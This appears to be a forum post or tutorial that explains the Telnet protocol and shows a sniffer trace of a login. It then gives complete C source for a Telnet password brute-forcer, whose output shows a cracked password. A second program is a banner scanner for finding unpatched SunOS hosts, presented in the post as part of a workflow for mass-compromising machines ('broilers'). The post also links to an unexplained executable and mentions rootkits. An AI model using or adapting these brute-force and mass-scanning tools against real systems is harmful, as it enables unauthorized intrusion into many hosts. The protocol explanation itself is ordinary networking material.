So-called attacks on Telnet come down to nothing more than guessable user passwords and overflows in the Telnet service process. Beyond those, I don't think Telnet has many problems. A Telnet connection is not as simple as everyone imagines: although it has no encryption like SSH, it is still more involved than FTP.
D:\> telnet 192.168.25.1
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
login: chi
Password: xxxxxxx
Last login: Mon Feb 24 13:43:30 from 192.168.25.1
[chi@chi chi]$
Now let's learn a little about Telnet. The purpose of the Telnet protocol is to provide a fairly general, bidirectional, eight-bit byte-oriented communication facility. Its primary goal is to allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. It is envisioned that the protocol may also be used for terminal-to-terminal communication and for process-to-process communication (distributed computation).
A Telnet connection is a TCP connection used to carry data interspersed with Telnet control information. The Telnet protocol is built on three ideas:
1. The Network Virtual Terminal (NVT);
When a Telnet connection is established, each end is assumed to use a Network Virtual Terminal, the NVT. The NVT is an imaginary device that represents a canonical, generic terminal. This removes the need for the "server" and "user" hosts to keep information about the characteristics of each other's terminals: each host maps its own terminal onto the NVT and can deal with the conversation directly.
2. The mechanism for negotiating options;
Because the two ends will usually want to go beyond the basic NVT, they use the DO, DON'T, WILL, WON'T structure to let the user host and the server agree on a more elaborate set of conventions for the Telnet session. Options include changing the character set, the echo mode, and more. The basic rule for setting an option is that either party may initiate a request for it to take effect; the other party can accept or reject the request. If the request is accepted, the option takes effect immediately; if it is rejected, the connection keeps the basic NVT properties.
3. Coordination of terminals and processes;
At the end of each line the terminal hardware gives up control. When this happens, the local computer handles the input data and decides whether output is required; if not, control is handed back to the terminal. If output is required, the computer keeps control until the output data has been sent. The difficulty of using such a terminal across a network is obvious, so the coordination requirements here are high.
Every Telnet command consists of at least two bytes: an IAC byte followed by the command code. Commands that deal with option negotiation are three bytes long, the third byte being the code of the option referenced. The defined Telnet commands are listed below.
SE                   240  End of subnegotiation parameters.
NOP                  241  No operation.
Data Mark            242  The data stream portion of a Synch. This should always be accompanied by a TCP Urgent notification.
Break                243  NVT character BRK.
Interrupt Process    244  The IP function.
Abort Output         245  The AO function.
Are You There        246  The AYT function.
Erase Character      247  The EC function.
Erase Line           248  The EL function.
Go Ahead             249  The GA signal.
SB                   250  Indicates that what follows is subnegotiation of the indicated option.
WILL (option code)   251  Indicates the desire to begin performing, or confirmation that you are now performing, the indicated option.
WON'T (option code)  252  Indicates the refusal to perform, or to continue performing, the indicated option.
DO (option code)     253  Indicates the request that the other party perform, or confirmation that you are expecting the other party to perform, the indicated option.
DON'T (option code)  254  Indicates the demand that the other party stop performing, or confirmation that you are no longer expecting the other party to perform, the indicated option.
IAC                  255  Data byte 255.
We use a sniffer to trace the Telnet login process.
9, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.391, 66,
Telnet
Command: Do Terminal-Type
Command: Do Terminal-Speed
Command: Do X-Display-Location
Command: Do New-Environ
10, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 60,
Telnet
Command: Will Terminal-Type
Command: Will NAWS
13, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,
Telnet
Command: Won't Terminal-Speed
Command: Won't X-Display-Location
Command: Won't New-Environ
18, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 63,
Telnet
Command: Do NAWS
Command: SB Terminal-Type
Command: SE
26, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 66,
Telnet
Command: Will Suppress-Go-Ahead
Command: Do Echo
Command: Will Status
Command: Do Toggle-Flow-Control
31, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,
Telnet
Command: Will Echo
Command: Don't Status
Command: Won't Toggle-Flow-Control
34, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.040, 126,
Telnet
Command: Don't Echo
Command: Will Echo
Data: Red Hat Linux release 7.3 (Valhalla)
(Note that the banner is received here)
35, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 57,
Telnet
Command: Won't Echo
36, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 61,
Telnet
Data: login:
(The "login:" prompt bytes are received)
39, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 57,
Telnet
Command: Do Echo
(The username can be sent at this point)
62, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 56,
Telnet
Data:
67, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 64,
Telnet
Data: Password:
(The "Password:" prompt bytes are received; the password is then sent and verified)
97, IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.220, 56,
Telnet
Data:
(Once sending is complete, a successful login returns the following)
104, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 105,
Telnet
Data: Last login: Thu Feb 27 10:06:16 from 192.168.25.1
For Telnet, a successful login ends here, and by following the process above you can write a Telnet username guesser yourself!
/******************************************************************************/
/* Below is the Telnet user check I wrote against Red Hat 7.3; it can be used  */
/* against anything else as long as you adapt it accordingly.                 */
/******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 23
#define MAX 1024

int usage(char *pro);
void telnet_banner(char *ip, char *check_user, char *check_pass);

int main(int argc, char *argv[])
{
    FILE *userfile;
    FILE *passfile;
    FILE *ipfile;
    char user[1024];
    char pass[1024];
    char scan_ip[1024];

    if (argc < 4) {
        usage(argv[0]);
        exit(1);
    }
    if ((ipfile = fopen(argv[3], "r")) == NULL) {
        printf("could not read the ipfile\n");
        exit(2);
    }
    while (fscanf(ipfile, "%s", scan_ip) != EOF) {
        if ((userfile = fopen(argv[1], "r")) == NULL) {
            printf("could not read the userfile\n");
            exit(2);
        }
        while (fscanf(userfile, "%s", user) != EOF) {
            if ((passfile = fopen(argv[2], "r")) == NULL) {
                printf("could not read the passfile\n");
                exit(2);
            }
            while (fscanf(passfile, "%s", pass) != EOF) {
                telnet_banner(scan_ip, user, pass);
            }
            fclose(passfile);
        }
        fclose(userfile);
    }
    fclose(ipfile);
    exit(1);
}

int usage(char *pro)
{
    printf("Welcome to www.9836.com\n");
    printf("usage: %s <userfile> <passfile> <ipfile>\n", pro);
    exit(0);
}

void telnet_banner(char *ip, char *check_user, char *check_pass)
{
    struct sockaddr_in addr;
    u_char buf[MAX];
    int sock, i = 0;

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        printf("socket failed\n");
        exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(ip);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        printf("connect failed\n");
        exit(1);
    }
    /* answer the server's first option requests: every IAC DO gets an IAC WON'T */
    while (i < 10) {
        read(sock, buf, 1);
        if (buf[0] == 255) {            /* IAC */
            read(sock, buf + 1, 2);
            if (buf[1] == 253) {        /* is DO */
                buf[1] = 252;
                write(sock, buf, 3);    /* send WON'T */
            }
        }
        i++;
    }
    if (buf[0] != 0) {
        bzero(buf, sizeof(buf));
        read(sock, buf, sizeof(buf));   /* read the Telnet banner */
        printf("%s", buf);
    }
    bzero(buf, sizeof(buf));
    read(sock, buf, sizeof(buf));       /* login: prompt */
    buf[0] = 255;
    buf[1] = 253;
    buf[2] = 0x01;
    write(sock, buf, 3);                /* IAC DO ECHO */
    write(sock, check_user, strlen(check_user));    /* send the username */
    buf[0] = 0x0d;
    buf[1] = 0x0a;
    write(sock, buf, 2);                /* CR LF */
    read(sock, buf, sizeof(buf));
    read(sock, buf, sizeof(buf));       /* Password: prompt */
    write(sock, check_pass, strlen(check_pass));    /* send the password */
    buf[0] = 0x0d;
    buf[1] = 0x0a;
    write(sock, buf, 2);                /* CR LF */
    bzero(buf, sizeof(buf));
    read(sock, buf, sizeof(buf));       /* read the login result */
    printf("%s", buf);
    if (strstr((char *)buf, "from") != NULL) {  /* "Last login: ... from" means success */
        printf("\nuser %s is found, password is %s\n", check_user, check_pass);
    }
    close(sock);
}
/******************************************************************************/
Usage results:
E:/cygwin/home/chi> telnet user.txt pass.txt ip.txt
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
Last login: Thu Feb 27 20:07:49 from 192.168.25.3
user chi is found, password is 2211wen
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword: Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword: Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword: Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword: Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
E:/cygwin/home/chi>
Apart from guessable Telnet user passwords, all that remains is an overflow in the Telnet service or the Telnet process! Telnet's login actually goes through the login program; hasn't everyone thought of a rootkit?
There are still many hosts that have not been patched against the SunOS Telnet vulnerability! As for exploiting SunOS Telnet, I won't go into it! I will only summarise the way to collect a large number of "broilers" (compromised hosts)!
In a default SunOS installation Telnet is enabled, and most SunOS hosts do not deliberately change its banner, so the Telnet banner is very important to us!
First open SuperScan and scan a large range for port 111 or 22, which separates UNIX machines from Windows ones, so that Windows hosts are left out; then save the list you scanned and import it into SuperScan again, this time scanning port 23. No host is missed! Then filter SuperScan's IP list into a list of plain IPs! [You need this program for that: http://9836.com/software/file.exe]
Next comes the Telnet banner scan! Don't forget the program above; I have changed it into a Telnet banner check instead of a user scan!
/******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 23
#define MAX 1024
FILE *output;

int usage(char *pro);
void telnet_banner(char *ip, char *times);

int main(int argc, char *argv[])
{
    FILE *input;
    char scan_ip[1024];

    if (argc < 3) {
        usage(argv[0]);
        exit(1);
    }
    if ((output = fopen(argv[2], "wb")) == NULL) {
        printf("could not create the outputfile\n");
        exit(2);
    }
    if ((input = fopen(argv[1], "r")) == NULL) {
        printf("could not read the inputfile\n");
        exit(2);
    }
    while (fscanf(input, "%s", scan_ip) != EOF) {
        telnet_banner(scan_ip, argv[3]);    /* argv[3] is NULL unless a third argument is given */
    }
    fclose(input);
    fclose(output);
    exit(1);
}

int usage(char *pro)
{
    printf("Welcome to www.9836.com\n");
    printf("usage: %s <ipfile> <outputfile>\n", pro);
    exit(0);
}

void telnet_banner(char *ip, char *times)    /* times is accepted but not used */
{
    struct sockaddr_in addr;
    u_char buf[MAX];
    int sock, i = 0;

    (void)times;
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        printf("socket failed\n");
        exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(ip);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        printf("connect failed\n");
        exit(1);
    }
    /* answer the server's first option requests: every IAC DO gets an IAC WON'T */
    while (i < 10) {
        read(sock, buf, 1);
        if (buf[0] == 255) {            /* IAC */
            read(sock, buf + 1, 2);
            if (buf[1] == 253) {        /* is DO */
                buf[1] = 252;
                write(sock, buf, 3);    /* send WON'T */
            }
        }
        i++;
    }
    if (buf[0] != 0) {
        bzero(buf, sizeof(buf));
        read(sock, buf, sizeof(buf));   /* read the Telnet banner */
        printf("%s", buf);
        if (strstr((char *)buf, "SunOS") != NULL) {
            buf[14] = 0;                /* keep only the first 14 bytes of the banner */
            fprintf(output, "%s ", buf);
            fputs(ip, output);
            fputc('\n', output);
        }
    }
    close(sock);
}
/******************************************************************************/
Please give me more guidance, and thank you for your help.